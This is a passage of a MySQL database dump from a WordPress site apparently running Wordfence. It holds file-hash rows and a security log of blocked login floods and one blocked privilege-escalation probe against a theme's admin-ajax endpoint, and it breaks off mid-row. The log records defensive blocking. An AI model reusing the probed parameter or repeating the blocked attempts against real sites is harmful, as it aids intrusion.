ԀWͱ-c','wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P|=U_t','zyԎ\ZA*aC)egVxR˿=','',0,'?'),('y7MA@','wp-includes/widgets/class-wp-widget-rss.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2C<|8\'Z','@1|Tc)5.T$TtD2V','',0,'?'),('F\rxw~\rܱ\n','wp-includes/widgets/class-wp-widget-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q].upľ?','dxc&޹8N[`','',0,'?'),('-[ip\\^]','wp-includes/widgets/class-wp-widget-tag-cloud.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֦/&ԩ)','cc-Vo\ZI<1KaDhBz2','',0,'?'),('\0 k~U5T','wp-includes/widgets/class-wp-widget-text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ChmiW>','~h4;M2>kKgvGN(TDJ','',0,'?'),('S&az8Jض9','wp-includes/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'Y_Su \0{bX','mַYsaӌ,̓;O#z=:','',0,'?'),('@sB0<{l3','wp-includes/wlwmanifest.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ԑi^','ƤJľ**X|icy-u6pC-$*\n','',0,'?'),('Let\"pc(	e','wp-includes/wp-db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@m$kDȣosx','~\nŷB%qHGn*(h','',0,'?'),('(^3N3','wp-includes/wp-diff.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X@Ez}','XtG^0za\0S[cfŉ','',0,'?'),('^\'q0','wp-links-opml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','寣ǖ?0%ZG','1D!vGTdآrK~\'','',0,'?'),('$jX])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','34mbw*T;','h(t݃\ne	Ǫ[]L','',0,'?'),('\r\0FJBe','wp-login.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!lz%ɛX',' K\rC$?0A5.~Rj@P\'E','',0,'?'),('3T.^ƙ<','wp-mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^v4-IK','CNiۀS{-\\?\\Ŏ\"','',0,'?'),(';1ы#Y_Nt','wp-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\rsU(','*#\"u4c֛n<	','',0,'?'),(',4#(#','wp-signup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','޳+z*R','B*\'-/P}qN(I(1Yl','',0,'?'),('o㮚-;?X:pҡ','wp-trackback.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kp`x\"l۫Α',';G6)8/:/cB}]#e','',0,'?'),('4ڂL$,K[u','xmlrpc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^`x\"','Ǥ#-|֨ln5ɀ','',0,'?');
/*!40000 ALTER TABLE `wpxb_wffilemods` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfhits`
--

DROP TABLE IF EXISTS `wpxb_wfhits`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfhits` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `attackLogTime` double(17,6) unsigned NOT NULL,
  `ctime` double(17,6) unsigned NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT 0,
  `statusCode` int(11) NOT NULL DEFAULT 200,
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) unsigned NOT NULL,
  `newVisit` tinyint(3) unsigned NOT NULL,
  `URL` text DEFAULT NULL,
  `referer` text DEFAULT NULL,
  `UA` text DEFAULT NULL,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text DEFAULT NULL,
  `actionData` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `k1` (`ctime`),
  KEY `k2` (`IP`,`ctime`),
  KEY `attackLogTime` (`attackLogTime`)
) ENGINE=MyISAM AUTO_INCREMENT=8557 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfhits`
--

LOCK TABLES `wpxb_wfhits` WRITE;
/*!40000 ALTER TABLE `wpxb_wfhits` DISABLE KEYS */;
INSERT INTO `wpxb_wfhits` VALUES (8037,1564682588.429974,1564682587.740200,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7526,1564474121.825006,1564474121.503800,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7527,1564474120.630539,1564474120.269600,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7528,1564474119.480327,1564474119.152700,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7529,1564474118.092867,1564474117.781800,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7530,1564474117.001700,1564474116.654500,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7531,1564474115.779599,1564474115.380400,'\0\0\0\0\0\0\0\0\0\0\\r^',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7348,0.000000,1564464601.584909,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7349,1564464712.657008,1564464712.250300,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7350,1564464711.136988,1564464710.782400,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7351,1564464709.646753,1564464709.321700,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7352,1564464707.791339,1564464707.488800,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7353,1564464706.398471,1564464706.062900,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7354,1564464704.986673,1564464704.677600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7355,1564464703.079205,1564464702.714500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7356,1564464701.588170,1564464701.249100,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7357,1564464700.164210,1564464699.778600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7358,1564464698.183591,1564464697.813600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7359,1564464696.698288,1564464696.275700,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7360,1564464695.203034,1564464694.804400,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7361,1564464693.291280,1564464692.851000,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7362,1564464691.738218,1564464691.317800,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7363,1564464690.240083,1564464689.759100,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7364,1564464688.228746,1564464687.795300,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7365,1564464686.707293,1564464686.169300,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7366,1564464685.046261,1564464684.553500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7367,1564464682.999160,1564464682.653400,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7368,1564464681.581912,1564464681.196000,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7369,1564464680.125559,1564464679.713900,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7370,1564464678.198920,1564464677.876800,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7371,1564464676.779180,1564464675.820000,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7372,1564464674.699532,1564464674.237200,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7373,1564464672.620514,1564464672.293500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7374,1564464671.220181,1564464670.899800,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7375,1564464669.727870,1564464669.419600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7376,1564464667.857417,1564464667.473900,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7377,1564464666.357145,1564464666.027600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7378,1564464664.890188,1564464664.476600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7379,1564464662.891557,1564464662.508500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7380,1564464660.950493,1564464660.568500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7381,1564464659.474784,1564464659.082300,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7382,1564464657.538447,1564464657.126300,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7383,1564464656.051475,1564464655.730200,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7384,1564464654.597029,1564464654.277500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7385,1564464652.767940,1564464652.367800,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7386,1564464651.261869,1564464650.257600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7387,1564464648.530294,1564464647.993100,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7388,1564464646.397831,1564464645.924600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7389,1564464644.825559,1564464644.264000,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7390,1564464643.151806,1564464642.762600,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7391,1564464641.154174,1564464640.748400,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7392,1564464639.623002,1564464639.176500,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7393,1564464638.056953,1564464637.524200,'\0\0\0\0\0\0\0\0\0\05',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security 